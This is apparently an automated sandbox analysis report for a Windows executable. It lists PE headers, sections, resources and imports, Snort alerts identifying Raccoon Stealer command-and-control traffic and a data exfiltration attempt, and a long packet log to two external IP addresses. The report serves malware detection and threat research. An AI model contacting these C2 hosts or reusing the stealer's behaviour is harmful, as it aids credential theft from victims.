[ C ] VS2010 build 30319
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x23adc	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x27bb000	0x3120	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x27bf000	0x1854	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1c230	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x23300	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1c000	0x1dc	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1a3db	0x1a400	False	0.452260044643	data	6.26345677908	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x1c000	0x85e0	0x8600	False	0.28807136194	data	4.61117785601	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x25000	0x2795ba4	0x50a00	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x27bb000	0x3120	0x3200	False	0.74953125	data	6.50589684966	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x27bf000	0x109b0	0x10a00	False	0.0791089050752	data	1.02783799379	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AFX_DIALOG_LAYOUT	0x27bdfe8	0x2	data	Mongolian	Mongolia
PAMIFEGIHURULUFUKIYUVUWOGULOJOK	0x27bd860	0x6f0	ASCII text, with very long lines, with no line terminators	Mongolian	Mongolia
RT_ICON	0x27bb2a0	0x25a8	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ACCELERATOR	0x27bdf50	0x78	data	Mongolian	Mongolia
RT_GROUP_ICON	0x27bd848	0x14	data	English	United States
RT_VERSION	0x27bdff0	0x130	data	Mongolian	Mongolia
None	0x27bdfc8	0xa	data	Mongolian	Mongolia
None	0x27bdfd8	0xa	data	Mongolian	Mongolia

Imports

DLL	Import
KERNEL32.dll	TlsGetValue, InterlockedIncrement, GetCommState, GetProfileStringW, UnlockFile, CallNamedPipeW, FreeEnvironmentStringsA, GetNumberFormatA, FindResourceExA, GlobalAlloc, GetPrivateProfileIntA, GetConsoleAliasExesLengthW, HeapDestroy, CreateSemaphoreA, EnumResourceLanguagesA, GetModuleFileNameW, GetCompressedFileSizeA, GetSystemDirectoryA, CreateActCtxA, GetBinaryTypeW, lstrlenW, LCMapStringA, GetStartupInfoA, SetThreadLocale, GetStdHandle, CopyFileExW, FreeLibraryAndExitThread, GetLastError, GetProcAddress, CreateNamedPipeA, EnterCriticalSection, LoadLibraryA, OpenMutexA, WritePrivateProfileStringA, SetThreadIdealProcessor, FindAtomA, SetSystemTime, FindNextFileA, WriteProfileStringA, CreateIoCompletionPort, GetModuleHandleA, FindFirstChangeNotificationA, HeapSetInformation, GetCurrentDirectoryA, SetFileShortNameA, FindAtomW, UnregisterWaitEx, GetSystemTime, DeleteFileA, GetVolumeInformationW, LocalFileTimeToFileTime, GetThreadContext, GetCPInfoExW, GetCommandLineW, WideCharToMultiByte, EncodePointer, DecodePointer, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, InterlockedDecrement, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, GetModuleHandleW, SetLastError, HeapValidate, IsBadReadPtr, ExitProcess, LeaveCriticalSection, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapCreate, WriteFile, IsProcessorFeaturePresent, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, LoadLibraryW, RtlUnwind, LCMapStringW, MultiByteToWideChar, GetStringTypeW, SetFilePointer, GetConsoleCP, GetConsoleMode, HeapAlloc, GetModuleFileNameA, HeapReAlloc, HeapSize, HeapQueryInformation, HeapFree, SetStdHandle, FlushFileBuffers, RaiseException, CreateFileW, CloseHandle
ADVAPI32.dll	InitiateSystemShutdownA, AbortSystemShutdownA
WINHTTP.dll	WinHttpOpen

Version Infos

Description	Data
Translation	0x0120 0x04b8

Possible Origin

Language of compilation system	Country where language is spoken	Map
Mongolian	Mongolia
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/28/21-07:38:32.515164	TCP	2033973	ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download)	49731	80	192.168.2.5	185.138.164.150
09/28/21-07:38:37.212371	TCP	2033973	ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download)	49731	80	192.168.2.5	185.138.164.150
09/28/21-07:38:39.384625	TCP	2033974	ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt	49731	80	192.168.2.5	185.138.164.150

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2021 07:38:31.491318941 CEST	49730	443	192.168.2.5	149.154.167.99
Sep 28, 2021 07:38:31.491374016 CEST	443	49730	149.154.167.99	192.168.2.5
Sep 28, 2021 07:38:31.491537094 CEST	49730	443	192.168.2.5	149.154.167.99
Sep 28, 2021 07:38:31.510858059 CEST	49730	443	192.168.2.5	149.154.167.99
Sep 28, 2021 07:38:31.510889053 CEST	443	49730	149.154.167.99	192.168.2.5
Sep 28, 2021 07:38:31.579721928 CEST	443	49730	149.154.167.99	192.168.2.5
Sep 28, 2021 07:38:31.579837084 CEST	49730	443	192.168.2.5	149.154.167.99
Sep 28, 2021 07:38:31.583271980 CEST	49730	443	192.168.2.5	149.154.167.99
Sep 28, 2021 07:38:31.583295107 CEST	443	49730	149.154.167.99	192.168.2.5
Sep 28, 2021 07:38:31.583559990 CEST	443	49730	149.154.167.99	192.168.2.5
Sep 28, 2021 07:38:31.633383989 CEST	49730	443	192.168.2.5	149.154.167.99
Sep 28, 2021 07:38:31.941021919 CEST	49730	443	192.168.2.5	149.154.167.99
Sep 28, 2021 07:38:31.978470087 CEST	443	49730	149.154.167.99	192.168.2.5
Sep 28, 2021 07:38:31.978502989 CEST	443	49730	149.154.167.99	192.168.2.5
Sep 28, 2021 07:38:31.978513002 CEST	443	49730	149.154.167.99	192.168.2.5
Sep 28, 2021 07:38:31.978574991 CEST	443	49730	149.154.167.99	192.168.2.5
Sep 28, 2021 07:38:31.978636980 CEST	49730	443	192.168.2.5	149.154.167.99
Sep 28, 2021 07:38:31.978662968 CEST	49730	443	192.168.2.5	149.154.167.99
Sep 28, 2021 07:38:31.986447096 CEST	49730	443	192.168.2.5	149.154.167.99
Sep 28, 2021 07:38:31.986483097 CEST	443	49730	149.154.167.99	192.168.2.5
Sep 28, 2021 07:38:31.995321989 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.030574083 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.030710936 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.031197071 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.031245947 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.065964937 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.066009045 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.506263018 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.506295919 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.506318092 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.506340027 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.506344080 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.506367922 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.506383896 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.506386042 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.506428003 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.515163898 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.552275896 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.743393898 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.743428946 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.743457079 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.743474960 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.743520975 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.743733883 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.743771076 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.743796110 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.743824959 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.743844032 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.743866920 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.743901968 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.743933916 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.743957996 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.743999004 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.744205952 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.744224072 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.744299889 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.779926062 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.779968977 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.779988050 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.780010939 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.780029058 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.780050039 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.780070066 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.780086040 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.780095100 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.780118942 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.780139923 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.780160904 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.780164957 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.780181885 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.780200005 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.780205011 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.780221939 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.780230999 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.780244112 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.780266047 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.780270100 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.780292988 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.780317068 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.780332088 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.780354977 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.780373096 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.780380011 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.780392885 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.780411959 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.780412912 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.780436039 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.780453920 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.780472040 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.780527115 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.815402985 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.815445900 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.815469980 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.815509081 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.815532923 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.815548897 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.815557957 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.815582991 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.815607071 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.815629005 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.815653086 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.815654993 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.815681934 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.815706968 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.815715075 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.815730095 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.815752029 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.815754890 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.815779924 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.815804958 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.815817118 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.815829992 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.815854073 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.815856934 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.815881014 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.815902948 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.815967083 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.816011906 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.816015959 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.816054106 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.816071033 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.816096067 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.816498995 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.816530943 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.816551924 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.816569090 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.816577911 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.816617966 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.850831985 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.850904942 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.850958109 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.850996017 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851027012 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.851032972 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851049900 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.851074934 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851106882 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851164103 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851196051 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.851206064 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851214886 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.851243973 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851267099 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.851281881 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851313114 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851334095 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.851339102 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851362944 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851387024 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851414919 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851434946 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.851444006 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851445913 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.851480007 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851496935 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.851505995 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851538897 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851562023 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.851577997 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851604939 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851627111 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851635933 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.851654053 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851671934 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851691961 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851708889 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851727009 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851747036 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851772070 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851797104 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851821899 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851821899 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.851847887 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851874113 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.851875067 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851880074 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.851891994 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851910114 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851931095 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851949930 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851969957 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.851983070 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.851995945 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.852021933 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.852045059 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.852058887 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.852066994 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.852088928 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.852091074 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.852111101 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.852118969 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.852128983 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.852144957 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.852164030 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.852370977 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.852392912 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.888176918 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.888216972 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.888237953 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.888258934 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.888281107 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.888300896 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.888323069 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.888341904 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.888540983 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.888597012 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.888681889 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.888714075 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.888736963 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.888761997 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.888788939 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.888817072 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.888849974 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.888858080 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.888878107 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.888900995 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.888928890 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.888952017 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.888976097 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889000893 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889024019 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889046907 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889070034 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889095068 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889118910 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889142036 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889164925 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889189005 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889209986 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889233112 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889256954 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889281988 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889306068 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889328957 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889350891 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889373064 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889394999 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889419079 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889442921 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889445066 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.889466047 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.889470100 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889471054 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.889473915 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.889477015 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.889480114 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.889482975 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.889486074 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.889489889 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.889492989 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.889493942 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889496088 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.889499903 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.889503002 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.889506102 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.889508963 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.889511108 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.889513969 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.889518023 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889540911 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889559984 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:32.889564991 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:32.889591932 CEST	80	49731	185.138.164.150	192.168.2.5
